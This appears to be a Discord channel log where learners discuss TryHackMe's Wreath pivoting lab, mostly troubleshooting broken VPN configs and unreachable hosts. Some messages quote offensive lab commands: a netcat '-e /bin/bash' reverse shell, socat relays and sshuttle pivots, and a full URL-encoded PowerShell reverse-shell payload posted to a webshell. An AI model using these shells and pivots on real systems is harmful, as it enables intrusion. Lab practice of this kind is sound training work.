#wreath-network

1 messages · Page 3 of 1

alpine shadow
#

You mean you cant join back? I didn't face this one, as soon as I left an rejoined the room. I was able to get my vpn file and then start the network

stiff silo
#

i mean if i leave the room, it still shows up in my rooms... its as if i never left

#

no option to join because i never left...and i dont get a vpn file

alpine shadow
#

This should be resolved by the support team easily, I am not sure why they aren't addressing

stiff silo
#

they say they cant kick me out of the room

alpine shadow
#

😶

stiff silo
#

did u join a different network ?

alpine shadow
stiff silo
#

i mean the subnet

#

10.200.101.200

#

is it still the same or different

alpine shadow
#

I had a different subnet: 10.200.85.200

stiff silo
#

yeah i think thats the problem, that subnet must be bonkers, but i cant leave it

#

like a toxic ex

alpine shadow
#

kekw Lol

oak sand
#

woah, I just started this network. I like it 👍

sick cypress
#

its pretty nice

#

ive done it twice

oak sand
smoky aurora
#

Hi guys
So when I upload the nc file to root @prod serv and I try run it it doesn’t work
It gives some sort of new line error
Last time I just used the nc file that someone else had uploaded and it worked fine but now the network has been reset and when I upload the file it doesn’t work
And I don’t know why
Can anyone help?

hasty carbonBOT
lusty saffron
uneven hound
#

HI, can anyone help please?
https://tryhackme.com/r/room/wreath
Task 17
When trying to do nmap scan from .200 machine (prod-serv), all ports for .100 and .150 machines are filtered, however in room walkthrough it says that there should be open ports on .150 machine

sharp ice
#

You may need to reset the newtwork.

uneven hound
#

Did it twice during the weekend, didn't help.

uneven hound
#

It's on 10.201.17.x network, FYI

plain zephyr
#

can confirm I just booted the network (hasn't been reset) and still having the same issue as qwe

#

mine is on a different subnet, interestingly

buoyant dune
#

The command they provided on task 44 to get the NTML admin hash from Sam and system is not working error is something like object is not scriptable ( I have downloaded both file on my local machine and I am sure there is not syntax error or typo)

plain zephyr
#

I'm intending to send another reset vote in 5m once the hourly cooldown ends, should make it 3/4

plain zephyr
#

just tried again now that the network has reset, and the ports are still not working

sharp ice
#

How long ago did it restart?

plain zephyr
#

41m ago

#

also for avoidance of doubt, in case I am doing something wrong here

#

oh I can't post images here I guess

hasty carbonBOT
sharp ice
#

You need to verify your account.

#

When you verify, you can send embedded images and gifs

plain zephyr
#

oh yeah thanks, that worked

sharp ice
plain zephyr
#

have tried that as well as combinations including -sS, -sX -sF, and -sN

#

also have tried the entire range of ports, but I'm just testing 1-99 there as I know there's at least one port within that range, given the answer for the task contains ** as one of the ports in it

ruby elbow
#

Hi there,

I can't have a reverse shell for the exploitation phase Task 6. I already did it few weeks ago but I tried today and i have this mistake :

I tried with the Attack box and with Exegol. I also tried with Metasploit (exploit(linux/http/webmin_backdoor)

#

Hi sir,

I tried it but I don't have a reverse shell.
@dull robin

plain zephyr
#

just wanted to check if there is any further info regarding the issue I mentioned earlier? wondering if someone who has completed this room can confirm that it's not just me doing something incorrectly

sharp ice
#

@merry robin feel like donating some of your time?

I never really finished Wreath, I'll have to at some point.

merry robin
#

I mean, there should definitely be ports open on 150, accessible to 200.
The most likely issue is people being dickheads.

Other possibilities include:

  • Someone on staff has been messing with the base image and screwed it up. Unlikely, but wouldn't be the first time.
  • The security groups have been changed and are now messed up. Again, very unlikely.
  • The logic which controls the boxes isn't working properly. I haven't seen the code that does it, but from past experience that's not hugely unlikely.

The first two options would affect every subnet, so I suspect we'd be seeing more complaints than we are.

merry robin
#

The null and Christmas scans probably won't do much there, but that should give you a clear answer.

uneven hound
plain zephyr
# merry robin Try: ``` nmap -Pn -sT -vv -p 3389 10.201.123.150 ```

Just woke up so haven’t had a chance to test this but I definitely have run a scan with -sT and -Pn on the machine. What makes me think it wouldn’t be the first issue you mentioned (dickheads) is that it’s persisted across network resets, although I suppose someone could be doing the same thing multiple times. I’ve tried this immediately after a network reset though, when I wouldn’t think there’s enough time to close all of the ports on 150.

plain zephyr
#

okay yeah I've run the command immediately after a network reset just now, at the first possible opportunity (as 200 took some time to become accessible)

merry robin
#

Yeah, I have no idea what's going on there then. Something must have happened to either the security groups or the instance itself (cc @fair breach)

stiff thorn
#

Hey, I'm currently on the first-nmap scanning inside the host, I've uploaded the static nmap binary, however, firstly it takes hours to run the scan on a single host, secondly, it doesn't output the open ports for me, any suggestions?

#

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2024-08-14 13:38 BST
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.03% done
Stats: 0:01:47 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 7.10% done; ETC: 14:03 (0:23:20 remaining)

quick harness
stiff thorn
#

./nmap-dakiddo -T4 -p1-15000 10.201.135.150 -oN scan-full.txt

#

25 mins per scan, is a pretty long time, idk what wrong

quick harness
stiff thorn
#

Yeah thats the task, what I mean is even when the scan finished, I don't get the output of open ports for me

quick harness
#

What kind of access do you have? SSH?

stiff thorn
#

yup

quick harness
# stiff thorn yup

That’s weird. It should output it, can you send a screenshot of what you see after you ran a scan

#

Verify yourself first so you can send screenshots

hasty carbonBOT
stiff thorn
#

Hey guys I could really need some help, while inside the root@prod-serv, both IP's return me filtered ports

#

[root@prod-serv tmp]# ./nmap-dakiddo -p80 10.201.134.150

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2024-08-14 14:24 BST
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for ip-10-201-134-150.eu-west-1.compute.internal (10.201.134.150)
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up (-0.20s latency).
PORT STATE SERVICE
80/tcp filtered http
MAC Address: 02:32:93:AC:B3:5B (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds
[root@prod-serv tmp]# curl http://10.201.134.150
^C
[root@prod-serv tmp]# curl http://10.201.134.150:80
^C
[root@prod-serv tmp]# ./nmap-dakiddo -p80 10.201.134.100

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2024-08-14 14:25 BST
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for ip-10-201-134-100.eu-west-1.compute.internal (10.201.134.100)
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up (-0.20s latency).
PORT STATE SERVICE
80/tcp filtered http
MAC Address: 02:14:79:D0:ED:F3 (Unknown)

plain zephyr
#

@stiff thorn this isn't just you, a couple of people have had the same issue (including myself)

#

I spent about a day and then just moved onto other rooms while I wait for it to be resolved

merry robin
#

Next on the list.
@jabba.sh please escalate lmao
Network go brrrr

#

Tf

#

@cyan vine

#

There were go

cyan vine
#

Hm?

#

Network bricked?

plain zephyr
#

no ports appear open on .100 or .150 from prod-serv

merry robin
#

But yes. TL;DR: needs debugged

blazing rock
blazing rock
plain zephyr
#

was afk sorry, yeah I did

blazing rock
#

I am trying to find out when the subnets for Wreath changed from 10.200.x.x to 10.201.x.x and if that is causing the issue.

steel walrus
#

Subnet is still 10.200.x.x for me.

blazing rock
steel walrus
#

Not getting any response currently

blazing rock
#

Back to drawing board I go. 😄

steel walrus
#

Gimme a sec.

#

I just realized I was using 201 subnet...facepalm

blazing rock
#

Aah, the subnet deception. 😉

steel walrus
#

from the prod-serv with the reverse shell included in the exploit. I got some open ports. Can't remember if that's all of them, but the scan is still running.

#

hope that helps.

blazing rock
#

Aah so from 10.200.52.200 it is working.

blazing rock
winter lintelBOT
#

Gave +1 Rep to @steel walrus (current: #118 - 60)

steel walrus
#

yup, seems like it, you are welcome. Glad I could be a little help.

blazing rock
#

Will have to check whether the security-group for .150 specifies allow inbound based on 10.200 even when in a 10.201 subnet.

stiff thorn
#

Hey, still a problem here for me. IP address of prod-server 10.201.134.200, both 100 and 150 seems filtered, can't curl http on 150 also, any suggestion?

#

After reset ofcourse, still doesn't work

blazing rock
teal meadow
#

./coder-nmap 10.201.17.150 -vv

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2024-08-18 14:18 BST
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Initiating ARP Ping Scan at 14:18
Scanning 10.201.17.150 [1 port]
Completed ARP Ping Scan at 14:18, 0.20s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:18
Completed Parallel DNS resolution of 1 host. at 14:18, 0.00s elapsed
Initiating SYN Stealth Scan at 14:18
Scanning ip-10-201-17-150.eu-west-1.compute.internal (10.201.17.150) [6150 ports]
SYN Stealth Scan Timing: About 23.75% done; ETC: 14:21 (0:01:40 remaining)
Stats: 0:00:30 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 23.90% done; ETC: 14:21 (0:01:39 remaining)
SYN Stealth Scan Timing: About 48.06% done; ETC: 14:21 (0:01:06 remaining)
SYN Stealth Scan Timing: About 72.37% done; ETC: 14:21 (0:00:35 remaining)
Completed SYN Stealth Scan at 14:20, 124.32s elapsed (6150 total ports)
Nmap scan report for ip-10-201-17-150.eu-west-1.compute.internal (10.201.17.150)
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up, received arp-response (-0.20s latency).
All 6150 scanned ports on ip-10-201-17-150.eu-west-1.compute.internal (10.201.17.150) are filtered because of 6150 no-responses
MAC Address: 02:49:B0:CA:79:3F (Unknown)

Read data files from: /etc
Nmap done: 1 IP address (1 host up) scanned in 124.57 seconds
Raw packets sent: 12302 (541.256KB) | Rcvd: 1 (28B)

#

hope u fix it guys it has been like this for a days

blazing rock
blazing rock
blazing rock
plain zephyr
uneven hound
winter lintelBOT
#

Gave +1 Rep to @blazing rock (current: #16 - 472)

winter lintelBOT
#

Gave 1 Rep to timtaylor1 (current: #16 - 473)

plain zephyr
#

@blazing rock just want to confirm, should 150 be able to ping 200 and 100 from it?

I'm having difficulties establishing any sort of communication out from 150 back to 200, i.e. pings aren't working, and the powershell reverse shell command listed in the network task is stalling for 10s ish and then just dying, and socat -v isn't showing any data being transmitted

#

could very well be something I'm doing wrong but I figured I'd ask just because it seems like the sort of thing that might be related

#

context:

#

on prod-serv:

uneven hound
uneven hound
#

As a workaround, you can run commands from the next task (21) via curl/burp. I managed to create a user and logged into .150 machine via evil-winrm

blazing rock
uneven hound
#

Got stuck on Task 29 - generated stager doesn't work on .150 machine, I'm getting empty output after trying to run the stager via webshell (no agent being created)
Probably because of the same reason I and @plain zephyr had problems with Task 20. Connection cannot be established from .150 back to .200

#

I get an exception with the following error message when trying to run the stager via Evil-winRM:
Exception calling "DownloadData" with "1" argument(s): "Unable to connect to the remote server"

plain zephyr
#

Task 20 for me, yeah. the task directs me to copy and paste the powershell command, substituting my IP on the VPN as well as the port (16969 in my case, which you can see is being forwarded via socat on prod-serv)

#

I also ran firewall-cmd --zone=public --add-port 16969/tcp so can confirm that was done

long cairn
#

Is the network working for others? The Git server appears down and inaccessible for me.

#

for the record, I've tried resetting the network and redownloading the config file, nothing works.

uneven hound
uneven hound
#

Did anyone make it through Task 29? It looks like there's still no connection from .150 to .200

long cairn
#

10.201.149.150 still inaccessible

sharp ice
uneven hound
winter lintelBOT
#

Gave +1 Rep to @sharp ice (current: #1 - 2656)

uneven hound
uneven hound
#

Tried network reset, the problem persists

uneven hound
#

Also, it seems that .100 machine is down. Can't access .100 web page after successfully establishing connection via chisel and adding socks5 proxy via FoxyProxy

red shadow
#

Unable to download wreath network config file ,
Upon downloading greeted with unknown error occurred msg

red shadow
#

any help ?

wheat fractal
#

Can someone please check if all ports on the wreath network are in ignored state please couse I don't think it's supposed to be like that. blobfingerguns

sharp ice
wheat fractal
#

ok

wheat fractal
#

I'm not too sure where to find it

wheat fractal
wheat fractal
#

ok it works

wheat fractal
#

pwd
/usr/libexec/webmin
cd ..

pwd
/usr/libexec/webmin
cd ..

pwd
/usr/libexec/webmin

Help I can't get out of this directory

merry robin
wheat fractal
merry robin
# wheat fractal Well I had to couse that's what made it work

The key word there is "pseudo". It's not an interactive shell -- just a wrapper around a HTTP endpoint which accepts shell commands and returns the output.
Things like changing the directory won't work because there's no persistence.

Hence why the next step is to get a real shell

wheat fractal
merry robin
wheat fractal
merry robin
wheat fractal
merry robin
wheat fractal
upper quiver
#

Feck.
Had my SSH connection going and everything but it shout down cause I forgot to click the Extend button in the last hour 😢
It's [allegedly] back up now, but nothing's responding 😡

#

Uptime is 34mins - anyone able to confirm things are responding? (can ping 10.50.55.1, nothing from 10.200.57.200)

karmic sun
#

i'm trying to install powershell empire when i run the command to start the server i get a python error

Traceback (most recent call last):
File "/usr/share/powershell-empire/empire.py", line 11, in <module>
import empire.server.server as server
File "/usr/share/powershell-empire/empire/server/server.py", line 14, in <module>
from empire.server.common import empire
File "/usr/share/powershell-empire/empire/server/common/empire.py", line 18, in <module>
from empire.server.core import hooks_internal
File "/usr/share/powershell-empire/empire/server/core/hooks_internal.py", line 5, in <module>
import jq as jq
ModuleNotFoundError: No module named 'jq'

any idea ? i tried installing the jq module using apt install python3-jq but no good

topaz gale
#

Hi everyone. I got a problem in Wreath
when i use sshuttle to set up an agent
The command
sshuttle -r root@10.200.105.200 --ssh-cmd "ssh -i id_rsa" 10.200.105.0/24
Response: [local sudo] Password:
but i can't brute it with hashcat
Does anyone knows the code

lusty saffron
#

What are you trying to brute force here?

topaz gale
#

because it ask me password

#

i don't know why. i already have the id_rsa with root

lusty saffron
#

It's asking for your password. not for id_rsa

#

Password for your user on your system, it needs root privileges to setup the shuttle

topaz gale
#

ohh it ask me the kali user password? i will try it . thanks too much

topaz gale
#

What's the reason for this?cri

lusty saffron
#

Is the network up?
There should be a note or something for sshuttle in the room, -x flag maybe

topaz gale
#

the network is ok.

#

the -x flag i have already tried

#

the root id_rsa file i just copy it content then create a file in kali Then paste the content in and give 600permission

#

should i mv the orginal file into my kali by http

lusty saffron
#

Are you able to login, ssh -i id_rsa root@...?

topaz gale
#

I tried that. It didn't work

lusty saffron
#

Then something is wrong on the server. Maybe someone changed the SSH port or stopped it altogether, access the server the way you did to set up the id_rsa there. Gotta figure out on your own.

If it doesn't work, try voting for network reset at last.

topaz gale
#

Okay, I get it. Thank you

upper quiver
surreal sail
#

Why is curl request blocked but ping is permitted

#

From prod and pc I can ping my machine but I can’t curl

upper quiver
#

curl may not be installed.
||Are you actually using curl?|| 😉

cerulean prawn
balmy dirge
#

Yep.

balmy dirge
cerulean prawn
winter lintelBOT
#

Gave +1 Rep to @cerulean prawn (current: #55 - 142)

cerulean prawn
# balmy dirge Ah. Thanks for clarifying.

About these issues affecting Wreath and Holo networks, I am helping another user in #room-help about the Active Directory network called "Lateral Movement and Pivoting"
And I have just realized that you can use the AttackBox without using the VPN configuration; up to recently, there was a bug whereby you had to use it
Have you tried Wreath using the AttackBox?

Well, forget about that: Wreath needs that VPN config file in all circumstances: see screenshot

balmy dirge
cerulean prawn
# balmy dirge leaving room , moves me to 10.200.71.x, joining takes me to 10.200.84.x. same fo...

leaving and joining does change the IP address for prod-serv on the network diagram for Wreath
I have just done it right now:

  • from 10.200.101.200
  • to 10.200.84.200
    which means leaving/joining moved me from subnet 10.200.101.0/24 to 10.200.84.0/24
    if I read your message correctly, leaving/joining moved you from subnet 10.200.71.x to 10.200.84.x
    BTW: still not possible to download VPN configuration though
cerulean prawn
surreal sail
#

and also certutil doesnt work 😔

#

||there is an ssh.exe file tho so maybe i can try reverse tunneling but idk if it will just simply not work I also tried to execute a php rev shell and a powershell rev shell via the PoC on the personal PC||

upper quiver
surreal sail
#

ill try leaving the room and rejoining after a while

upper quiver
#

You'll need to make sure ports are forwarded (at each hop) - or that machine 2 has an open port (from M3, etc.)

surreal sail
balmy dirge
cerulean prawn
cerulean prawn
#

I cannot download the VPN configuration file for the Wreath network and I cannot regenerate it either
Symptoms: the download or regenerate buttons spin for 1 minutes, with no effect
no VPN file means no access to Wreath network for me
I have just created a support ticket for that
If you have the same issue, please consider creating a support ticket too, so that the issue gets the right visibility
NB: you create a support ticket by clicking on THM cloud bubble displayed at the bottom right of each THM web page

cerulean prawn
gleaming rapids
#

Gotcha, well hope it gets resolved soon

blazing rock
blazing rock
cerulean prawn
#

to be clear: I would not be surprised the network works, that is useful for all the users who have downloaded their VPN file some time ago
the problem is for me: I do not have that VPN file and cannot download it, so I am locked out of Wreath

blazing rock
blazing rock
cerulean prawn
# blazing rock If you don't mind, can you please try leaving the room and rejoining, and try to...

I am starting that
the next network was 10.200.84.X, but I am stuck on it, probably because I am doing the leave/join too fast
I'll slow down
Here is the progress so far:

10.200.87.X: starting point
10.200.84.X: (multiple times: too fast)
10.200.85.X
10.200.87.X: again!
10.200.101.X
10.200.105.X: 500 error browsing Access page (see screenshot)
10.200.57.X
10.200.73.X

I'll do a couple more before I leave for the night Now is bedtime
I can carry on tomorrow: if you have a recommendation as to how much time to wait before to join (and to leave?), that would optimize the speed of the process
Thank you for your kind help

cerulean prawn
#

screenshot shows the error page when browsing to Access page while on 10.200.105.X

blazing rock
#

Let me try to get into a 10.200.x subnet and see what happens. Going to wait 10 minutes before rejoining.

slate drift
#

I can't download the wreath openvpn file it says "An unknown error has occurred". I tried leaving the room and rejoining this didn't work too.

ancient stream
cerulean prawn
cerulean prawn
cerulean prawn
# blazing rock If you don't mind, can you please try leaving the room and rejoining, and try to...

Sept 17: progress update results

MONDAY:
10.200.87.X: starting point
10.200.84.X: (multiple times: too fast)
10.200.85.X
10.200.87.X: again!
10.200.101.X
10.200.105.X: 500 error browsing Access page (see screenshot)
10.200.57.X
10.200.73.X
TUESDAY:
10.200.84.X    first of Tuesday
10.200.101.X    VPN DL OK
        ping 10.200.101.200: KO
        33 min up: voted 3/5 then 4/5 for reset
        no ping after 55 minutes up
        regen VPN: nothing better
10.200.85.X
10.200.87.X    again!
10.200.57.X    
10.200.96.X
10.200.43.X
10.200.87.X    again!
10.200.84.X    again!
10.200.105.X
10.200.57.X    again!
        VPN DL OK
10.200.84.X    again!
10.200.87.X    again!
10.200.101.X    again!
        500 error page for DL and regen
10.200.57.X    again!
        VPN DL/regen KO this time
10.200.84.X    again!
10.200.87.X    again!
10.200.101.X    again!

Methodology:

  • wait min 10 minutes before joining after leaving
  • wait min 5 minutes for network to be up before ping + nmap and VPN config download
    Conclusion so far:
  • no 10.201.X subnet reached so far
  • slow process
  • I cycle too often through the same subnets
  • I cannot see a pattern giving hope to escape from a 10.200.x to a 10.201.x subnet
  • ~~ will try for the rest of the day~~
  • will stop after today unless there is a better methodology
    I look forward to more guidance
cerulean prawn
blazing rock
winter lintelBOT
#

Gave +1 Rep to @cerulean prawn (current: #48 - 162)

ancient stream
#

hm.. even my attackbox dont have wreath.ovpn and i am a subscriber.

#

will ad this information to my ticket.

sharp ice
ancient stream
wild sable
#

I am unable to download VPN config file for Wreath network as well.

#

I get 10.200.87.200 network. I have tried regenerating the VPN config, and then download, but it just spins and displays "An unknown has error occurred" after few seconds.

#

Similar issue with Holo. IP assigned to DC-SRV01: 10.200.95.30

cerulean prawn
cerulean prawn
stark yarrow
glad rivet
#

I cannot download the VPN file

#

is that the same case with everyone?

cerulean prawn
frozen needle
#

Is this just not even gonna be acknowledged, just paid 12 bucks for a non-functional room

gleaming rapids
#

Its been acknowledged by timtaylor, but no fix yet as far as I can see - you could email support and see what they say support@tryhackme.com

frozen needle
#

I contacted support yesterday, no response.

gleaming rapids
#

May take a few business days to get a response from them

sharp ice
#

Support is delayed.

digital girder
#

this screen pop up when i tried to download wreath configuration file, Do I need to take action or just it is a temporary issue?

bold gorge
#

getting same errro message

#

i wasnt able to downlaod VPN since last week

#

contacted support and hasn't received response yet.

cerulean prawn
# digital girder this screen pop up when i tried to download wreath configuration file, Do I need...

I think it is an intermittent problem, but it repeats itself as you cycle through different subnets for Wreath after you leave and join
I suspect however you will not be able to download the VPN config file for Wreath, and therefore will not be able to use that network
you can see here my attempts: #wreath-network message
if it fails for you, I suggest you create a support ticket with THM (check the THM cloud bubble icon on the bottom right of each THM web page) and that you document the issue including the subnet or subnets you have been asssigned while attempting
I think your ticket will add to the previous ones, like mine, and raise the visibility of the issue with THM
thank you

winter lintelBOT
#

Gave +1 Rep to @digital girder (current: #2241 - 1)

cerulean prawn
bold gorge
#

last week

cerulean prawn
lone walrus
#

Anyone able to download wreath's vpn? I still see 500

sterile seal
#

Hello guys. I have intermittent network problems reaching wreath network boxes. It's getting worse since yesterday and it's not possible to work on it. When one box is available, the other is not reachable. I can see here I am not the only to complain. I am new to Try Hack Me so how can we get this solved?

#

Just for clarification I did succeed to download the openvpns config and connected to the network (more or less) but then machines are not accessible (through ssh for .200, through winrm for .150) etc.

lone walrus
#

this is what i got from the support team:

I see that you opened multiple tickets - I see that the problem was about wreath. Unfortunately that is a global issue and is present for all the users - our team is working on the fix but we are not sure how long it will take

sharp ice
lone walrus
#

yeah got that

sterile seal
#

I canceled my subscription, it makes no sense to pay where there is no service.

digital girder
#

any updates ?

cerulean prawn
balmy dirge
#

Just peeping here, time to time, to check if its working 🙂

fleet garden
outer aspen
#

it seemsis still not working

rough fjord
#

commenting so the channel does not dissappear from my discord interface

sharp ice
rough fjord
#

only non main ones, like if I search for a more niche room channel and I don't comment in it, it does not stick in suggested

rough fjord
#

desktop, but it applies to any "hidden" channel that normally does not appear unless you specifically navigate to it

sharp ice
#

Have you enabled this?

rough fjord
#

first, time I see it, now it unlocked a bunch more channels, cheers

rough fjord
#

anyone else able to interact with the network ? I get the VPN file and an internal IP, but the target does not respond to anything.....

cerulean prawn
rough fjord
#

`12: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 10.50.66.6/24 scope global tun0
valid_lft forever preferred_lft forever
inet6 fe80::f58d:a217:afdb:b3db/64 scope link stable-privacy proto kernel_ll
valid_lft forever preferred_lft forever

kali@kali:~/Downloads/Wreath [14-10-2024 15:26]$ ping 10.200.73.200
PING 10.200.73.200 (10.200.73.200) 56(84) bytes of data.
^C
--- 10.200.73.200 ping statistics ---
2 packets transmitted, 0 received, 100% packet loss, time 1012ms

kali@kali:~/Downloads/Wreath [14-10-2024 15:26]$ `

rough fjord
#

btw opened ticket 4 hours ago and no replies kekw

#

and it's running as far as I can see

cerulean prawn
rough fjord
#

same, I have 10.50.66.6

#

🤔

cerulean prawn
# rough fjord 🤔

as I was confused with ping going wrong (with the state Stopped), I regenerated my VPN
it was not necessary, of course
that may be another option for you?

rough fjord
#

okay, I restarted by VM again and now it works

#

now I will try to blitz through it one go to avoid troubleshooting it again kekw

fossil mango
#

Ah wreath isnt working, i thought it was just me

cerulean prawn
sand hull
#

hello,,, anyone who knows a proxy that is free of charge please?

elfin briar
#

hello guys does the wreath room works ? i click on join room several times but it doesn't work , i wonder if it"s only me who have this problem ?

lone walrus
#

I reached out to support 2-3 weeks back.. they said they have been working on it. No resolution yet

#

I'm gonna check for few more days and cancel my subscription

sharp ice
#

There was a fix pushed out, which issue were you having?

fossil mango
#

The network doesnt start...

novel pagoda
#

The network works if you restart it I think

#

Or sorry If you leave the room

#

But I'm gonna go ahead and reset it

marble merlin
#

I thought im the only one who experiencing this issue

#

wreath network still not working

fossil mango
#

It works now

#

I didnt do anything

#

¯_(ツ)_/¯

fossil mango
#

Its not working again :/

merry robin
fossil mango
#

Gotcha!

mellow sleet
white quarry
#

I'm having an issue starting joining the wreath room. I click on "Join Room" and nothing happens

#

Also, I restarted the room's progress a couple of months ago, yet it's still showing my previous progress for some reason

fossil mango
fossil mango
#

its working @mellow sleet 🙂

worthy thunder
#

cannot ping the first IP address given to test nettwork access. I am using attackthebox

#

"If you are a subscriber and are using the AttackBox then you will be able to find this connection pack in a directory on your desktop. This will be automatically connected when the AttackBox starts so don't run the connection pack manually on the AttackBox if you are a subscriber."

#

well clearly not

#

if it automatically connected

#

I would be able to ping the IP address in the diagram

worthy thunder
#

@merry robin

merry robin
# worthy thunder <@650476435269484549>

I'm gonna be honest -- I have no idea what's going on with the THM network infrastructure.
It's not something I have any control over, and it seems to be broken for a lot of people. The network itself is fine, but the infrastructure which hosts it does not appear to be.
Raise a support ticket and see what they say

worthy thunder
#

If they want to fix the attackthebox issue they can just view my comment above in this chat. Saves me having time to put in a ticket

worthy thunder
#

network down again, this room is horrible

merry robin
#

... Which it doesn't seem to be a lot of the time these days

worthy thunder
#

the content is good though I will give it that

ashen trench
#

Question
I'm reading through the Reverse Shell Relay section under Pivoting: Socat in the Wreath room
I understand up to where we create the relay - the execution of ./socat tcp -l:8000... on the compromised server - socat is now listening on 8000 and relaying that connection back to Kali, right?
But I get confused on this bit:
From here we can then create a reverse shell to the newly opened port 8000 on the compromised server. This is demonstrated in the following screenshot, using netcat on the remote server to simulate receiving a reverse shell from the target server:

chmod +x ./nc-MuirlandOracle
./nc-MuirlandOracle 127.0.0.1 8000 -e /bin/bash

Where did the nc-<USERNAME> come from and what is the netcat listener doing on prod-serv in this scernario?

merry robin
#

If you were doing this "properly", netcat would be on a different server

ashen trench
winter lintelBOT
#

Gave +1 Rep to @merry robin (current: #10 - 804)

ashen trench
#

I acheived the Enumeration, Pivoting and Code Review sections for Wreath two days ago. But i couldn't spend time on it yesterday so i am picking it up again today.
I am reconnected to the VPN and can successfully ssh into prod-serv using the id_rsa key
However, i cannot sshuttle via git-serv today. I am using the following command (same as two days ago):

sshuttle -r root@10.200.101.200 --ssh-cmd "ssh -i id_rsa" 10.200.101.0/24 -x 10.200.101.200

But i get this error:

Traceback (most recent call last):
  File "/usr/local/bin/sshuttle", line 5, in <module>
    from sshuttle.cmdline import main
  File "/usr/local/lib/python2.7/dist-packages/sshuttle/cmdline.py", line 5, in <module>
    import sshuttle.client as client
  File "/usr/local/lib/python2.7/dist-packages/sshuttle/client.py", line 302
    assert(not re.search(rb'[^-\w\.]', hostname))
                                    ^
SyntaxError: invalid syntax

Why would I know be getting an error for sshuttle when it worked two days ago?

ashen trench
merry robin
#

Yeah, I'm seeing Python 3 in their code base. Reasonable chance you've screwed up your global python environment somewhere along the way.

ashen trench
#

I now have everything working again and i have run the following commands:
TAB 1

┌──(kali㉿kali)-[~/Desktop/THM/Wreath/Pivoting]
└─$ ssh -i id_rsa root@10.200.101.200
[root@prod-serv ~]# firewall-cmd --zone=public --add-port 15151/tcp
success
[root@prod-serv ~]# curl <KA.LI.IP.ADD>/socat -o /tmp/socat-1of3 && chmod +x /tmp/socat-1of3
...
[root@prod-serv ~]# /tmp/./socat-1of3 tcp-l:15151 tcp:<KA.LI.IP.ADD>:443 &
[1] 2586
[root@prod-serv ~]# 

TAB 2

┌──(kali㉿kali)-[~/Desktop/THM/Wreath]
└─$ sshuttle -r root@10.200.101.200 --ssh-cmd "ssh -i Pivoting/id_rsa" 10.200.101.150 -x 10.200.101.200
[local sudo] Password: 
c : Connected to server.

TAB 3

┌──(kali㉿kali)-[~/Desktop/THM/Wreath/GitServer]
└─$ sudo nc -nvlp 443                         
listening on [any] 443 ...

ashen trench
# ashen trench I now have everything working again and i have run the following commands: **TAB...

But my PowerShell Reverse Shell command hangs for about 10-20 seconds and then drops and nothing shows up in my nc listener tab...

TAB 4

┌──(kali㉿kali)-[~/Desktop/THM/Wreath/GitServer]
└─$ curl -X POST -d "a=powershell.exe%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%2710.200.101.200%27%2C15151%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22" http://10.200.101.150/web/exploit-1of3.php
"" 
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/THM/Wreath/GitServer]
└─$ 
ashen trench
ashen trench
#

Any help would be appreciated - thank you 🙂

hollow adder
#

what is this help pls why i cant donwload the access ovpn

magic karma
hollow adder
#

ok bro i'll try it thanks

zenith pebble
#

I keep getting this same error. I tried leaving and rejoining the room as suggested above, but still keep receive the error message

exotic ridge
#

getting same problem

#

not able to download the VPN config file for Wreath
getting 500 error .

cerulean prawn
cerulean prawn
zenith pebble
#

Additionally I tried to use the attack
Box and that didn’t work either.

cerulean prawn
zenith pebble
#

On the attack box the txt file said that configs were already set. Also yes, the network status was running. I even voted to reset it and still couldn’t get the network to respond to nmap scans

cerulean prawn
zenith pebble
#

Gotcha. When I attempted to download the config file I received the 500 error

cerulean prawn
zenith pebble
#

I did it about 6 or 7 times

cerulean prawn
# zenith pebble I did it about 6 or 7 times

I suggest:

  • you leave more time between leave and join
  • make sure the new VPN config file is different from the previous one For instance, check that the MD5 hashes for the two files are different (command for that is md5sum <file_name>)
  • pay attention if you join the same instance as mine: 10.200.85.X, it works for me right now (check screenshot), hence I expect it should work for you too
  • preferably, use THM AttackBox at the beginning; once it works, move to your own local VM if you like it better so
    Please provide feedback, in particular if it works, as that would provide confidence the leave/join procedure indeed works
zenith pebble
#

Thanks so much! When I was attempting it yesterday I was on the 10.200.85.X network. I’ll let you know in a bit

cerulean prawn
zenith pebble
#

Regenerating and just downloading

exotic ridge
#
